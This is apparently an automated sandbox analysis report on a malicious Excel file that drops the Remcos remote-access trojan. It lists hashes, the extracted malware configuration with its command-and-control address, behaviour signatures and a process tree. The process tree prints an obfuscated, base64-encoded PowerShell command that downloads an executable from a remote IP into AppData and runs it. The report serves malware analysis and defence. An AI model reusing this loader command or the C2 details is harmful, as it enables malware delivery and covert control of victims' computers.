Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-12-2024 03:30

General

  • Target

    820d600f7e9de3c49ab72a5cf0eed154f8a733a971dc4d601a2941a2b1596aa1.xls

  • Size

    1.1MB

  • MD5

    5f2e46c7cb021508ad4cb1cb4785af35

  • SHA1

    49d152547e233e76c58586fa0b0be5f341cc65b0

  • SHA256

    820d600f7e9de3c49ab72a5cf0eed154f8a733a971dc4d601a2941a2b1596aa1

  • SHA512

    2b25d71308e8636d0caefbdb24181061da7d620dfc525422e46455ee0bd205801b8a863ffcc292e81b2636e067776010df0be3596dbefd157f5459b5fdddd8be

  • SSDEEP

    12288:bymzHJEUiOIBUzMTSHD3DERnLRmF8D9EPbxpsAQx1Zj+jeEPubjxAzrGbxzX7n41:hBaKbARM8k78Z+jppr8zr4i4Q8+a5d

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Detected phishing page

    Hiding page source

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\820d600f7e9de3c49ab72a5cf0eed154f8a733a971dc4d601a2941a2b1596aa1.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2236
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2260
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2448
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vv3gdkah.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA21.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEA20.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2032
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    2KB

    MD5

    bf784edee93fca58a4f656c76f07c1b4

    SHA1

    4965c03faaeec20f1b0cefa4844608e403d2569c

    SHA256

    82e0e5014ce5a84bb7fd5e2569c66912fbf4b6262c7f0e94f9a7085ff044188f

    SHA512

    3c480e5ddde056f5b250f66018b78158ecb265f7843416720fbf6dd8038ec2e3d4eca5655c85659d1e7fe5d887cc93e112861beb3aa2524a1d4f9fb2725e6475

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87063374136EEC47E933C8519BBDFF7F

    Filesize

    471B

    MD5

    90c52d81ab9066022771fa4424ea7e8f

    SHA1

    161e7b2f33071b4f2d52dab3e273e1b9edb55b0b

    SHA256

    a3e87172d27129cc41d87a9f38bab1912cd2d241b1934086678e1d88602c9284

    SHA512

    ec0a5f3a8a846383ddf29c57355516785de9a8c3dbcfad388c22e425298ab84617e45d994fa6946d89eeb6253916d9e8ece51cefced0542f23dc727917a2ff2f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    1KB

    MD5

    9047d91427fbc84f6f261fa8961d626b

    SHA1

    a51383a0e9eccbe2032f19ff1d5c91e866cfb69f

    SHA256

    3181b9f6bf992319794a86f7f27631619c7fcae1e208f4ced04e64b7ea577a19

    SHA512

    dc21fb378f8ef75fab3c7e80bf1fb7deb2364631a939d1ed113199be83e4a18113795b57620bdbf056876515293f79e8f50b3869b7ad175e073013b0616cba85

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    488B

    MD5

    49405a4fc5e251f72309f3613073e8ac

    SHA1

    05b8d9209f6bd272969a163b3ca9a196642bb044

    SHA256

    86570d2cf4515fa8434c8fcea54d23f6d779e86c5b463d110261efd253420ba3

    SHA512

    2a02b7be0e5d17ee7f9d004f2b980769bcfeac9837aabfd5c1d27bea7c22b447a367976a24cd91dfe9286135c7097540e56f649dd003059b10e4f55522b23541

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87063374136EEC47E933C8519BBDFF7F

    Filesize

    480B

    MD5

    ba0d82548ae0cbd53c021dc7dfb46401

    SHA1

    431fe42100f7c020a72b277f266854cf280f7ec2

    SHA256

    962cd8ac09f632d05ce7ffdbe949042e23a9ad5f23001cd482a621a307e3becb

    SHA512

    66a7c3f92e4b8e1a7dc4eadc07207c7fd3d9fa4ab7404e1c9f3ec8c47d6fed347841b824e8e3c9c3386891e18e3139821ec96805166699412763518d070b81c3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    fc723dcb074273724b2181a173736b4f

    SHA1

    024c16f7cbd9403a0f1243815aa64eba0ab69376

    SHA256

    ea2c3895694265132fe40702ec10eefc8b9089f2c6639bc3cd5eaafc9aed85ad

    SHA512

    229cadfd88ba4c7929d589a05937eee722b5216d6a87b196171dad16b8d095a987ee357926cdbc9145c04f6b5c8385ef3504b91181e44b6fb1f0f46f4b395fb8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    482B

    MD5

    7f7ad0e8d6c00f339d5471be3ef2270a

    SHA1

    6df5ea3b648c0b0b76b5a39dee26cf744eef797f

    SHA256

    c467c18badafa22c2e6387e074ce913cd07d1af559531325b9ca81028cffc954

    SHA512

    e844af411a7485de12a8d6483086c005d16cc26ff78ac7754bf1e5a3b7b5b4d045a02fbe54ae5443eca4e4d37bc860021a207f65b9c6dfa458f5b9158054692c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\newthingswithgreatupdateiongivenbestthingswithme[1].hta

    Filesize

    8KB

    MD5

    3afabaf5846da80d129955891618e019

    SHA1

    f6eaec256576cacc3a1fcb9bec9f5a5efed814de

    SHA256

    fa715055e15b315127a24704381a0bbc0f7c5442ead9d22afaf47b0c3e64a787

    SHA512

    c41d7745ce81de32c6e19758e40255e4ec3f6a54b5ef445f79182b172306e213f1d2cdffe4afc6511f880ebabbbb01b38e23f6aef31913812b3d34f04049930c

  • C:\Users\Admin\AppData\Local\Temp\CabD655.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESEA21.tmp

    Filesize

    1KB

    MD5

    8e8539653cad6117e86ed3fad1075b25

    SHA1

    ec1c1005cd4eaeb0aa393441b45122076ab194cc

    SHA256

    c2efff8bdc7ad0ef58306d92ae6638824be43bcb614511e42c1b450ae0578dbc

    SHA512

    e1c84a0180bf02cb905c910e006a3b4b41ab1c8c5562325e26f3cfe4f457c5532ff75d7fb604578da107ca332d0fd6053cb4ee912f73a31375ab1fac6076958e

  • C:\Users\Admin\AppData\Local\Temp\TarD677.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\vv3gdkah.dll

    Filesize

    3KB

    MD5

    b555b406e62fe3a6d5607d49922ced2d

    SHA1

    f89afdcbbf3c45f446fbf1cfc6f9b94236aa099b

    SHA256

    4f4bb9fca884766a952b432ae21753328d15138a2910f8de49a5069f3298ed63

    SHA512

    7d3849545760a070f21914d13426fe3b728a5aacf70e2eaf9fed8df5c667ad4f3c05b5ef164b1d34d170fe470c4b093b6600ea0fbb0bec2f4571f5405b148673

  • C:\Users\Admin\AppData\Local\Temp\vv3gdkah.pdb

    Filesize

    7KB

    MD5

    936221df9922306a382f0a04caffee04

    SHA1

    6a92d5c4cfcca944a12579f9f7b8200540610ac6

    SHA256

    a0a33611ffb148f2032787cbbfb4f768903da78652d6f5d85881a4040fc63bfc

    SHA512

    ec11deae0d330802ceca99c2111a8ef66d2de5c454c7656fba5a975040b8a9857635a7a39a15b597802d78a847b482cf37a8fecd0f05d89fe8a52936523bed7c

  • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    530KB

    MD5

    c6b0fba610732719435d9621878bc605

    SHA1

    789afce0b2016029215db7cca0ce7c4acfa54b4c

    SHA256

    ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d

    SHA512

    5d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCEA20.tmp

    Filesize

    652B

    MD5

    2ea94fa26e8347691f48e2a692af646f

    SHA1

    7a31760edf03cd11fb3a52b756279333d614ee20

    SHA256

    f9c4a75acab237e4539f253d5e49e76dc5ac3a98937d302e8d1dfeddc67f6b2f

    SHA512

    d199380acfa7180245326d70d3a45e44d3fd4ef0d94e285a30323cb774d96fe885728c8c5c0a56d5d024a95a78770c0c5fdea8716ca2d784d16069aa18b233d2

  • \??\c:\Users\Admin\AppData\Local\Temp\vv3gdkah.0.cs

    Filesize

    493B

    MD5

    00df4ae943d803cb15795b1fd55ead94

    SHA1

    fc1509b646d150cc4d1c2d92cf772be4af67716b

    SHA256

    e8d13d324b35fc23a6729caa22125343bfebb09476a9334e93e8c1804ce6314a

    SHA512

    e40826e83f25a3be3fdf26c1d5a667d0eb40d53d3f0fe46f8cc395152cd1eb46b98e193fc3a3f06b6cefadbed030d2a90a5575c1d235228d53d5f152d2e85796

  • \??\c:\Users\Admin\AppData\Local\Temp\vv3gdkah.cmdline

    Filesize

    309B

    MD5

    b48f322df48807992b0de3c8b3b7f7de

    SHA1

    6f2453174c1ef25ce84ef7120b685b5fa073d715

    SHA256

    c7b6c1948ac93c483c8568285318fc5fa58b9fc19e3c376ab3ba503418276b3f

    SHA512

    d13a608e4b8c1d39c2f3fdc826debd06a66d6e19cb7cd39be17154491c3ec48c09d31ebea61aa8d1fb9dfd0b84c3183cddc228cb8bb221b4a4cb95f51a41bf96

  • memory/2236-1-0x000000007284D000-0x0000000072858000-memory.dmp

    Filesize

    44KB

  • memory/2236-61-0x0000000002400000-0x0000000002402000-memory.dmp

    Filesize

    8KB

  • memory/2236-98-0x000000007284D000-0x0000000072858000-memory.dmp

    Filesize

    44KB

  • memory/2236-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2260-60-0x0000000000270000-0x0000000000272000-memory.dmp

    Filesize

    8KB

  • memory/3036-117-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-115-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-116-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-114-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-118-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-119-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-120-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-121-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-122-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-123-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-124-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-125-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3036-126-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB